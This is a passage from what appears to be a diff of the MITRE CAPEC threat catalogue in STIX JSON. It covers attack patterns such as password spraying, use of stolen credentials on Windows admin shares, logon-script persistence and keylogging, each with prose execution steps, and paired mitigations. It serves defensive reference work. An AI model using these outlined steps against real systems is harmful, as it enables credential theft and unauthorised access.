"2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c44dcaf3-84a3-4fc1-a9c4-3c1c06dbeac1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44f48a42-3c74-4fbb-885b-d16e52d1e21f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal credential access.", + "id": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6871bf92-f743-4558-b1fd-ca894de9bb78", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain.", + "external_references": [ + { + "external_id": "CAPEC-561", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/561.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services:SMB/Windows Admin Shares", + "external_id": "T1021.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021/002" + }, + { + "description": "Overview of problems that may occur when administrative shares are missing, 2017--03---13, Microsoft Corporation", + "external_id": "REF-577", + "source_name": "reference_from_CAPEC", + "url": 
"https://support.microsoft.com/en-us/help/842715/overview-of-problems-that-may-occur-when-administrative-shares-are-mis" + }, + { + "description": "Rob Smallridge, HAPT15 is alive and strong: An analysis of RoyalCli and RoyalDNS, 2018--03---10, NCC Group", + "external_id": "REF-578", + "source_name": "reference_from_CAPEC", + "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + }, + { + "description": "Assaf Dahan, Operation Cobalt Kitty: Cybereason Labs Analysis, 2017, CyberReason", + "external_id": "REF-579", + "source_name": "reference_from_CAPEC", + "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + } + ], + "id": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Windows Admin Shares with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + 
"x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "APT32 has leveraged Windows' built-in Net utility to use Windows Administrative Shares to copy and execute remote malware. [REF-579]", + "In May 2017, APT15 laterally moved within a Windows domain via Windows Administrative Shares to copy files to and from compromised host systems. This further allowed for the remote execution of malware. [REF-578]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows administrator credentials: The adversary must obtain known Windows administrator credentials in order to access the administrative network shares.

  2. Techniques
    An adversary purchases breached Windows administrator credentials from the dark web.
    An adversary leverages a key logger or phishing attack to steal administrator credentials as they are provided.
    An adversary conducts a sniffing attack to steal Windows administrator credentials as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows administrator password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows administrator credentials.

Experiment

  1. Attempt domain authentication: Try each Windows administrator credential against the hidden network shares until the target grants access.

  2. Techniques
    Manually or automatically enter each administrator credential through the target's interface.

Exploit

  1. Malware Execution: An adversary can remotely execute malware within the administrative network shares to infect other systems within the domain.

  2. Data Exfiltration: The adversary can remotely obtain sensitive data contained within the administrative network shares.

", + "x_capec_extended_description": "\n Windows systems within the Windows NT family contain hidden network shares that are only accessible to system administrators. These shares allow administrators to remotely access all disk volumes on a network-connected system and further allow for files to be copied, written, and executed, along with other administrative actions. Example network shares include: C$, ADMIN$ and IPC$. If an adversary is able to obtain legitimate Windows credentials, the hidden shares can be accessed remotely, via server message block (SMB) or the Net utility, to transfer files and execute code. It is also possible for adversaries to utilize NTLM hashes to access administrator shares on systems with certain configuration and patch levels.\n ", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The target administrative share allows remote use of local admin credentials to log into domain systems.", + "The adversary possesses a list of known Windows administrator credentials that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Windows administrator credentials for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential, leveraging it is trivial." 
+ }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eecc445b-fbb2-4188-870d-159485c94ef0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11eaef47-9b8a-4bb8-bf2f-63eb95d12037", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "spec_version": "2.1", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f482b089-26b2-468c-8161-bd9eea7cfe4b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "spec_version": "2.1", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the files in a shared location by adding 
malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.", + "external_references": [ + { + "external_id": "CAPEC-562", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/562.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Taint shared content", + "external_id": "T1080", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1080" + } + ], + "id": "attack-pattern--9d076056-3719-4afc-94f4-5d16aaee50a3", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Modify Shared File", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disallow shared content. Protect shared folders by minimizing users that have write access. 
Use utilities that mitigate exploitation like the Microsoft Enhanced Mitigation Experience Toolkit (EMET) to prevent exploits from being run.", + "id": "course-of-action--7c8c48ad-29e9-48a7-803e-dd6994eed5fd", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-562-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48a3e4bb-b139-4cfd-ad9b-bcafd4087f57", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c8c48ad-29e9-48a7-803e-dd6994eed5fd", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d076056-3719-4afc-94f4-5d16aaee50a3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. 
The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.", + "external_references": [ + { + "external_id": "CAPEC-563", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/563.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--80604cc1-88b5-4e55-846e-01cfc67966b2", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Add Malicious File to Shared Webroot", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions on directories that are accessible through a web server. Disallow remote access to the web root. Disable execution on directories within the web root. 
Ensure that permissions of the web server process are only what is required by not using built-in accounts and instead create specific accounts to limit unnecessary access or permissions overlap across multiple systems.", + "id": "course-of-action--fa8958ed-8fb1-4412-9a43-882a8093afba", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-563-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fac83968-b4fb-49f5-b904-487038f291fe", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa8958ed-8fb1-4412-9a43-882a8093afba", + "spec_version": "2.1", + "target_ref": "attack-pattern--80604cc1-88b5-4e55-846e-01cfc67966b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. 
Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.", + "external_references": [ + { + "external_id": "CAPEC-564", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/564.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Boot or Logon Initialization Scripts", + "external_id": "T1037", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1037" + }, + { + "description": "Create or Modify System Process: Launch Agent", + "external_id": "T1543.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/001" + }, + { + "description": "Create or Modify System Process: Launch Daemon", + "external_id": "T1543.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/004" + }, + { + "description": "Boot or Logon Autostart Execution", + "external_id": "T1547", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547" + } + ], + "id": "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Run Software at Logon", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict write access to logon scripts to necessary administrators.", + "id": "course-of-action--ac6fb253-4318-4476-bd92-98025e9f081b", + "modified": "2022-09-29T00:00:00.000Z", + "name": 
"coa-564-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0065118-5899-4093-ad4e-1d2e77d85ff5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac6fb253-4318-4476-bd92-98025e9f081b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. 
The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.\n ", + "external_references": [ + { + "external_id": "CAPEC-565", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Spraying", + "external_id": "T1110.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/003" + }, + { + "description": "ACSC Releases Advisory on Password Spraying Attacks, 2019--08---08, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-565", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/current-activity/2019/08/08/acsc-releases-advisory-password-spraying-attacks" + }, + { + "description": "Andy Greenberg, A notorious Iranian hacking crew is targeting industrial control systems, 2019--11---23, Ars Technica", + "external_id": "REF-566", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2019/11/a-notorious-iranian-hacking-crew-is-targeting-industrial-control-systems/" + }, + { + 
"description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "id": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Spraying", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user selects the phrase \"Password123\" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.", + "The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment." 
+ ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target's password policy: Determine the password policies of the target system/application.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
  3. Select passwords: Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)

  4. Techniques
    Select passwords based on common use or a particular user's additional details.
    Select passwords based on the target's password complexity policies.

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.

  2. Techniques
    Manually or automatically enter the first password for each known user account through the target's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Iterate through the remaining passwords for each known user account.
", + "x_capec_extended_description": "\n Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.\n Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. 
If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts on the target system/application." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "Applicable password lists.", + "A password cracking tool or a custom script that leverages the password list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--883bf7e0-d6d7-4599-a405-4cf773ba06f2", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--63dc5428-39f8-4790-9341-12ee76d16b3c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39894d0f-45fc-4d1e-ac83-029554eb758f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "spec_version": "2.1", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-566", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/566.html" + } + ], + "id": "attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Dump Password Hashes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-567", + "source_name": "capec", + 
"url": "https://capec.mitre.org/data/definitions/567.html" + } + ], + "id": "attack-pattern--e8f4c3d0-0aaf-4a96-b31c-9e6e8b5e15da", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Obtain Data via Utilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "external_id": "CAPEC-568", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html" + }, + { + "description": "Input Capture:Keylogging", + "external_id": "T1056.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/001" + } + ], + "id": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": 
